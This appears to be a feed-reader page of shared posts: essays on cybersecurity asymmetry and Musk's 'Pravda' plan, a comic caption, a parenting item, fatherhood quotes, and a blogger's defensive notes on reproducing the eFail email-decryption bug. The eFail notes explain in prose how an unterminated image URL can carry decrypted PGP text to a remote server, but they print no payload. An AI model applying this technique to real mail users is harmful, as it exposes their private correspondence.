52 stories
·
0 followers

Free Societies are at a Disadvantage in National Cybersecurity

2 Shares

Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post:

It seeks to explain why the United States is struggling to deal with the "soft" cyber operations that have been so prevalent in recent years: cyberespionage and cybertheft, often followed by strategic publication; information operations and propaganda; and relatively low-level cyber disruptions such as denial-of-service and ransomware attacks. The main explanation is that constituent elements of U.S. society -- a commitment to free speech, privacy and the rule of law; innovative technology firms; relatively unregulated markets; and deep digital sophistication -- create asymmetric vulnerabilities that foreign adversaries, especially authoritarian ones, can exploit. These asymmetrical vulnerabilities might explain why the United States so often appears to be on the losing end of recent cyber operations and why U.S. attempts to develop and implement policies to enhance defense, resiliency, response or deterrence in the cyber realm have been ineffective.

I have long thought this to be true. There are defensive cybersecurity measures that a totalitarian country can take that a free, open, democratic country cannot. And there are attacks against a free, open, democratic country that just don't matter to a totalitarian country. That makes us more vulnerable. (I don't mean to imply -- and neither do Russell and Goldsmith -- that this disadvantage implies that free societies are overall worse, but it is an asymmetry that we should be aware of.)

I do worry that these disadvantages will someday become intolerable. Dan Geer often said that "the price of freedom is the probability of crime." We are willing to pay this price because it isn't that high. As technology makes individual and small-group actors more powerful, this price will get higher. Will there be a point in the future where free and open societies will no longer be able to survive? I honestly don't know.

Read the whole story
cheerfulscreech
3 days ago
reply
Share this story
Delete

Customer Rewards

5 Comments and 17 Shares
We'll pay you $1.47 to post on social media about our products, $2.05 to mention it in any group chats you're in, and 11 cents per passenger each time you drive your office carpool past one of our billboards.
Read the whole story
alt_text_bot
9 days ago
reply
We'll pay you $1.47 to post on social media about our products, $2.05 to mention it in any group chats you're in, and 11 cents per passenger each time you drive your office carpool past one of our billboards.
cheerfulscreech
9 days ago
reply
Share this story
Delete
3 public comments
chrisrosa
9 days ago
reply
ouch...too real.
San Francisco, CA
sdevore
9 days ago
reply
oh this is the way my brain sees all these cards
Tucson, AZ
alt_text_at_your_service
9 days ago
reply
We'll pay you $1.47 to post on social media about our products, $2.05 to mention it in any group chats you're in, and 11 cents per passenger each time you drive your office carpool past one of our billboards.

To Get Through to Your Teens, Text Them

1 Comment and 2 Shares

Teenagers don’t enjoy talking to their parents. Actually, scratch that. Many don’t talk that much to their friends either, at least not with their voices. Teenagers like to text. Walk into any establishment where teens hang out and you will see them clumped together in small groups hovering over their cell phones.…

Read more...

Read the whole story
cheerfulscreech
10 days ago
reply
Is this insightful? Or just coddling? I worry that in a world where kids are growing up with insufficient social skills, this just reinforces the problem.
chemicalfacist
8 days ago
This is the world. In all honesty emojis will be incorporated into news articles and movies soon. The problem is people who refuse to adapt.
Share this story
Delete

The Ultimate Collection of Quotes About Fatherhood

1 Share

Fathers tend to be taken for granted.

We invariably make more of a fuss over Mom on Mother’s Day than Dad on Father’s Day, for one.

Dads are like a steady but less sentimentalized institution — the sun in our familial sky that warms and gives life but isn’t much thought about unless he goes missing.

Yet this belies the enormous impact fathers truly have on their children; while a dad’s nurturing may often take the form of playful roughhousing and silly jokes, his influence is quite serious and significant: the presence of a loving father greatly increases a child’s chances of success, confidence and resilience, physical and mental well-being, and yes, quite naturally, their sense of humor.

One of the manifestations of the way we take fathers for granted is that there exist many more quotes about Mom than dear old Dad (and even fewer about fathers and daughters). To make more accessible those great pearls of wisdom that do exist, we searched high and low for the very best, and created this ultimate treasury of quotes about fatherhood. These short quotations provide great prompts for reflection; typically, we’re so busy plowing ahead that we don’t pause to look up and get a “birds-eye” perspective on things — taking the time to ponder what our own dads meant to us, and the way we’re shaping, and should be savoring, our kids right now.   

Quotes About Fatherhood

“You don’t raise heroes, you raise sons. And if you treat them like sons, they’ll turn out to be heroes, even if it’s just in your own eyes.” –Walter M. Schirra, Sr. 

“Some dads liken the impending birth of a child to the beginning of a great journey.” –Marcus Jacob Goldman

“One father is more than a hundred schoolmasters.” –George Herbert

“Sherman made the terrible discovery that men make about their fathers sooner or later . . . that the man before him was not an aging father but a boy, a boy much like himself, a boy who grew up and had a child of his own and, as best he could, out of a sense of duty and, perhaps love, adopted a role called Being a Father so that his child would have something mythical and infinitely important: a Protector, who would keep a lid on all the chaotic and catastrophic possibilities of life.” –Tom Wolfe, The Bonfire of the Vanities

“The best way of training the young is to train yourself at the same time; not to admonish them, but to be seen never doing that of which you would admonish them.” –Plato

“The nature of impending fatherhood is that you are doing something that you’re unqualified to do, and then you become qualified while doing it.” –John Green

“One of the greatest things a father can do for his children is to love their mother.” –Howard W. Hunter

“To a father growing old nothing is dearer than a daughter.” –Euripides

“If there is any immortality to be had among us human beings, it is certainly only in the love that we leave behind. Fathers like mine don’t ever die.” –Leo Buscaglia

“That is the thankless position of the father in the family—the provider for all, and the enemy of all.” –J. August Strindberg

“Every father should remember one day his son will follow his example, not his advice.” –Charles Kettering

“Son, there are times a man has to do things he doesn’t like to, in order to protect his family.” –Ralph Moody

 “A boy needs a father to show him how to be in the world. He needs to be given swagger, taught how to read a map so that he can recognize the roads that lead to life and the paths that lead to death, how to know what love requires, and where to find steel in the heart when life makes demands on us that are greater than we think we can endure.” –Ian Morgan Cron

“Parenthood remains the single greatest preserve of the amateur.” –Alvin Toffler

“My father didn’t tell me how to live. He lived and let me watch him do it.” –Clarence Budington Kelland

“When you’re a dad, there’s no one above you. If I don’t do something that has to be done, who is going to do it?” –Jonathan Safran Foer, Here I Am

“‘Why do men like me want sons?’ he wondered. ‘It must be because they hope in their poor beaten souls that these new men, who are their blood, will do the things they were not strong enough nor wise enough nor brave enough to do. It is rather like another chance at life; like a new bag of coins at a table of luck after your fortune is gone.’” –John Steinbeck, Cup of Gold: A Life of Sir Henry Morgan, Buccaneer, with Occasional Reference to History

“If the past cannot teach the present, and the father cannot teach the son, then history need not have bothered to go on, and the world has wasted a great deal of time.” –Russell Hoban

“There are many kinds of success in life worth having. It is exceedingly interesting and attractive to be a successful business man, or railway man, or farmer, or a successful lawyer or doctor; or a writer, or a President, or a ranchman, or the colonel of a fighting regiment, or to kill grizzly bears and lions. But for unflagging interest and enjoyment, a household of children, if things go reasonably well, certainly makes all other forms of success and achievement lose their importance by comparison.” –Theodore Roosevelt

“Father!—To God Himself we cannot give a holier name.” –William Wordsworth

“We think our Fathers Fools, so wise we grow; Our wiser Sons, no doubt, will think us so.” –Alexander Pope

“His values embraced family, reveled in the social mingling of the kitchen, and above all, welcomed the loving disorder of children.” –John Cole

“Children are a poor man’s riches.” –English proverb

“It is easier to build strong children than to repair broken men.” –Frederick Douglass

“A girl’s father is the first man in her life, and probably the most influential.” –David Jeremiah

“Fathers, like mothers, are not born. Men grow into fathers and fathering is a very important stage in their development.” –David Gottesman

“Father of fathers, make me one,
A fit example for a son.”

–Douglas Malloch

“I believe that what we become depends on what our fathers teach us at odd moments, when they aren’t trying to teach us. We are formed by little scraps of wisdom.” –Umberto Eco 

“My father used to play with my brother and me in the yard. Mother would come out and say, ‘You’re tearing up the grass.’ ‘We’re not raising grass,’ Dad would reply. ‘We’re raising boys.’” –Harmon Killebrew

“Until you have a son of your own . . . you will never know the joy beyond joy, the love beyond feeling that resonates in the heart of a father as he looks upon his son. You will never know the sense of honor that makes a man want to be more than he is and to pass something good and hopeful into the hands of his son. And you will never know the heartbreak of the fathers who are haunted by the personal demons that keep them from being the men they want their sons to be.” –Kent Nerburn

“When my son looks up at me and breaks into his wonderful toothless smile, my eyes fill up and I know that having him is the best thing I will ever do.” –Dan Greenberg

“Being a great father is like shaving. No matter how good you shaved today, you have to do it again tomorrow.” –Reed Markham

“It is easier for a father to have children than for children to have a real father.” –Pope John XXIII

“When I looked at you first I saw not your mother and me, but your two grandfathers . . . and, as my father, whom I loved a great deal, had died the year before, I was moved to see that here, in you, he was alive.” –Peter Carey

“Dads are most ordinary men turned by love into heroes, adventurers, story-tellers, and singers of song.” –Pam Brown

“‘Father’ is the noblest title a man can be given. It is more than a biological role. It signifies a patriarch, a leader, an exemplar, a confidant, a teacher, a hero, a friend.” –Robert L. Backman 

“Noble fathers have noble children.” –Euripides

“The father who does not teach his son his duties is equally guilty with the son who neglects them.” –Confucius

“No man can possibly know what life means, what the world means, what anything means, until he has a child and loves it.” –Lafcadio Hearn

“I cannot think of any need in children as strong as the need for a father’s protection.” –Sigmund Freud

 “A father is a man who expects his son to be as good a man as he meant to be.” –Frank A. Clark

“His father watched him across the gulf of years and pathos which always divide a father from his son.” –John Marquand

“A family needs a father to anchor it.” –L. Tom Perry

“Words have an awesome impact. The impression made by a father’s voice can set in motion an entire trend of life.” –Gordon MacDonald

“Children need models rather than critics.” –Joseph Joubert 

“A father is someone you look up to no matter how tall you grow.” –Unknown

“Certain is it that there is no kind of affection so purely angelic as of a father to a daughter. In love to our wives there is desire; to our sons, ambition; but to our daughters there is something which there are no words to express.” –Joseph Addison

“Mostly you just have to keep plugging and keep loving—and hoping that your child forgives you according to how you loved him, judged him, forgave him, and stood watching over him as he slept, year after year.” –Ben Stein

“Life doesn’t come with an instruction book — that’s why we have fathers.” H. Jackson Browne 

“Fathers, you are your daughter’s hero. My father was my hero. I used to wait on the steps of our home for him to arrive each night. He would pick me up and twirl me around and let me put my feet on top of his big shoes, and then he would dance me into the house. I loved the challenge of trying to follow his every footstep. I still do.” –Elaine S. Dalton

“A good father is one of the most unsung, unpraised, unnoticed, and yet one of the most valuable assets in our society.” –Billy Graham

“When you teach your son, you teach your son’s son.” –The Talmud

“My father always said there are four things a child needs: plenty of love, nourishing food, regular sleep, and lots of soap and water. After that, what he needs most is some intelligent neglect.” –Ivy Baker Priest

“Like so much between fathers and sons, playing catch was tender and tense at the same time.” –Donald Hall

“By profession I am a soldier and take great pride in that fact, but I am also prouder, infinitely prouder, to be a father. A soldier destroys in order to build; the father only builds, never destroys.” –General Douglas MacArthur

“The lone father is not a strong father. Fathering is a difficult and perilous journey and is done well with the help of other men.” –John L. Hart

“Children of the new millennium when change is likely to continue and stress will be inevitable, are going to need, more than ever, the mentoring of an available father.” –Ian Grant

“The quality of a father can be seen in the goals, dreams, and aspirations he sets not only for himself, but for his family.” –Reed Markham

“Fathering is not something perfect men do, but something that perfects the man.” –Frank Pittman

“Never fret for an only son. The idea of failure will never occur to him.” –George Bernard Shaw

“My son is seven years old. I am fifty-four. It has taken me a great many years to reach that age. I am more respected in the community, I am stronger, I am more intelligent and I think I am better than he is. I don’t want to be his pal, I want to be a father.” –Clifton Fadiman

“Some day you will know that a father is much happier in his children’s happiness than in his own. I cannot explain it to you: it is a feeling in your body that spreads gladness through you.” –Honore de Balzac, Pere Goriot

“A child enters your home and for the next twenty years makes so much noise you can hardly stand it. The child departs, leaving the house so silent you think you are going mad.” –John Andrew Holmes

“Every parent is at some point the father of the unreturned prodigal, with nothing to do but keep his house open to hope.” –John Ciardi

The post The Ultimate Collection of Quotes About Fatherhood appeared first on The Art of Manliness.

Read the whole story
cheerfulscreech
10 days ago
reply
Share this story
Delete

Some notes on eFail

1 Share
I've been busy trying to replicate the "eFail" PGP/SMIME bug. I thought I'd write up some notes.

PGP and S/MIME encrypt emails, so that eavesdroppers can't read them. The bugs potentially allow eavesdroppers to take the encrypted emails they've captured and resend them to you, reformatted in a way that allows them to decrypt the messages.

Disable remote/external content in email

The most important defense is to disable "external" or "remote" content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when they want to display images, but not fill up the email with them. But most of the time this is illegitimate, they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and the width/height of this image is set to one pixel, so you don't even see it:

Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:


The problem is that as you read email messages, you often get frustrated by the fact the error messages and missing content, so you keep adding exceptions:


The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren't to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn't matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That's probably overkill. As long as the attacker can't use the "remote content" in emails, you are fine. Likewise, some have recommend disabling HTML completely. That's not even an option in any email client I've used -- you can disable sending HTML emails, but not receiving them. It's sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn't replicate the direct exfiltration

There rare two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like one of those tracking tags), allowing the entire message to be decrypted.

An example of this is the following email. This is a standard HTML email message consisting of multiple parts. The trick is that the IMG tag in the first part starts the URL (blog.robertgraham.com/...) but doesn't end it. It has the starting quotes in front of the URL but no ending quotes. The ending will in the next chunk.

The next chunk isn't HTML, though, it's PGP. The PGP extension (in my case, Enignmail) will detect this and automatically decrypt it. In this case, it's some previous email message I've received the attacker captured by eavesdropping, who then pastes the contents into this email message in order to get it decrypted.



What should happen at this point is that Thunderbird will generate a request (if "remote content" is enabled) to the blog.robertgraham.com server with the decrypted contents of the PGP email appended to it. But that's not what happens. Instead, I get this:


I am indeed getting weird stuff in the URL (the bit after the GET /), but it's not the PGP decrypted message. Instead what's going on is that when Thunderbird puts together a "multipart/mixed" message, it adds it's own HTML tags consisting of lines between each part. In the email client it looks like this:


The HTML code it adds looks like:

That's what you see in the above URL, all this code up to the first quotes. Those quotes terminate the quotes in the URL from the first multipart section, causing the rest of the content to be ignored (as far as being sent as part of the URL).

So at least for the latest version of Thunderbird, you are accidentally safe, even if you have "remote content" enabled. Though, this is only according to my tests, there may be a work around to this that hackers could exploit.

STARTTLS

In the old days, email was sent plaintext over the wire so that it could be passively eavesdropped on. Nowadays, most providers send it via "STARTTLS", which sorta encrypts it. Attackers can still intercept such email, but they have to do so actively, using man-in-the-middle. Such active techniques can be detected if you are careful and look for them.

Some organizations don't care. Apparently, some nation states are just blocking all STARTTLS and forcing email to be sent unencrypted. Others do care. The NSA will passively sniff all the email they can in nations like Iraq, but they won't actively intercept STARTTLS messages, for fear of getting caught.

The consequence is that it's much less likely that somebody has been eavesdropping on you, passively grabbing all your PGP/SMIME emails. If you fear they have been, you should look (e.g. send emails from GMail and see if they are intercepted by sniffing the wire).

You'll know if you are getting hacked

If somebody attacks you using eFail, you'll know. You'll get an email message formatted this way, with multipart/mixed components, some with corrupt HTML, some encrypted via PGP. This means that for the most part, your risk is that you'll be attacked only once -- the hacker will only be able to get one message through and decrypt it before you notice that something is amiss. Though to be fair, they can probably include all the emails they want decrypted as attachments to the single email they sent you, so the risk isn't necessarily that you'll only get one decrypted.

As mentioned above, a lot of attackers (e.g. the NSA) won't attack you if its so easy to get caught. Other attackers, though, like anonymous hackers, don't care.

Somebody ought to write a plugin to Thunderbird to detect this.

Summary

It only works if attackers have already captured your emails (though, that's why you use PGP/SMIME in the first place, to guard against that).

It only works if you've enabled your email client to automatically grab external/remote content.

It seems to not be easily reproducible in all cases.

Instead of disabling PGP/SMIME, you should make sure your email client hast remote/external content disabled -- that's a huge privacy violation even without this bug.





Notes: The default email client on the Mac enables remote content by default, which is bad:


Read the whole story
cheerfulscreech
29 days ago
reply
Share this story
Delete

The devil wears Pravda

2 Shares
Classic Bond villain, Elon Musk, has a new plan to create a website dedicated to measuring the credibility and adherence to "core truth" of journalists. He is, without any sense of irony, going to call this "Pravda". This is not simply wrong but evil.


Musk has a point. Journalists do suck, and many suck consistently. I see this in my own industry, cybersecurity, and I frequently criticize them for their suckage.

But what he's doing here is not correcting them when they make mistakes (or what Musk sees as mistakes), but questioning their legitimacy. This legitimacy isn't measured by whether they follow established journalism ethics, but whether their "core truths" agree with Musk's "core truths".

An example of the problem is how the press fixates on Tesla car crashes due to its "autopilot" feature. Pretty much every autopilot crash makes national headlines, while the press ignores the other 40,000 car crashes that happen in the United States each year. Musk spies on Tesla drivers (hello, classic Bond villain everyone) so he can see the dip in autopilot usage every time such a news story breaks. He's got good reason to be concerned about this.

He argues that autopilot is safer than humans driving, and he's got the statistics and government studies to back this up. Therefore, the press's fixation on Tesla crashes is illegitimate "fake news", titillating the audience with distorted truth.

But here's the thing: that's still only Musk's version of the truth. Yes, on a mile-per-mile basis, autopilot is safer, but there's nuance here. Autopilot is used primarily on freeways, which already have a low mile-per-mile accident rate. People choose autopilot only when conditions are incredibly safe and drivers are unlikely to have an accident anyway. Musk is therefore being intentionally deceptive comparing apples to oranges. Autopilot may still be safer, it's just that the numbers Musk uses don't demonstrate this.

And then there is the truth calling it "autopilot" to begin with, because it isn't. The public is overrating the capabilities of the feature. It's little different than "lane keeping" and "adaptive cruise control" you can now find in other cars. In many ways, the technology is behind -- my Tesla doesn't beep at me when a pedestrian walks behind my car while backing up, but virtually every new car on the market does.

Yes, the press unduly covers Tesla autopilot crashes, but Musk has only himself to blame by unduly exaggerating his car's capabilities by calling it "autopilot".

What's "core truth" is thus rather difficult to obtain. What the press satisfies itself with instead is smaller truths, what they can document. The facts are in such cases that the accident happened, and they try to get Tesla or Musk to comment on it.

What you can criticize a journalist for is therefore not "core truth" but whether they did journalism correctly. When such stories criticize "autopilot", but don't do their diligence in getting Tesla's side of the story, then that's a violation of journalistic practice. When I criticize journalists for their poor handling of stories in my industry, I try to focus on which journalistic principles they get wrong. For example, the NYTimes reporters do a lot of stories quoting anonymous government sources in clear violation of journalistic principles.

If "credibility" is the concern, then it's the classic Bond villain here that's the problem: Musk himself. His track record on business statements is abysmal. For example, when he announced the Model 3 he claimed production targets that every Wall Street analyst claimed were absurd. He didn't make those targets, he didn't come close. Model 3 production is still lagging behind Musk's twice adjusted targets.

https://www.bloomberg.com/graphics/2018-tesla-tracker/

So who has a credibility gap here, the press, or Musk himself?

Not only is Musk's credibility problem ironic, so is the name he chose, "Pravada", the Russian word for truth that was the name of the Soviet Union Communist Party's official newspaper. This is so absurd this has to be a joke, yet Musk claims to be serious about all this.

Yes, the press has a lot of problems, and if Musk were some journalism professor concerned about journalists meeting the objective standards of their industry (e.g. abusing anonymous sources), then this would be a fine thing. But it's not. It's Musk who is upset the press's version of "core truth" does not agree with his version -- a version that he's proven time and time again differs from "real truth".

Just in case Musk is serious, I've already registered "www.antipravda.com" to start measuring the credibility of statements by billionaire playboy CEOs. Let's see who blinks first.



I stole the title, with permission, from this tweet:



Read the whole story
cheerfulscreech
29 days ago
reply
Share this story
Delete
Next Page of Stories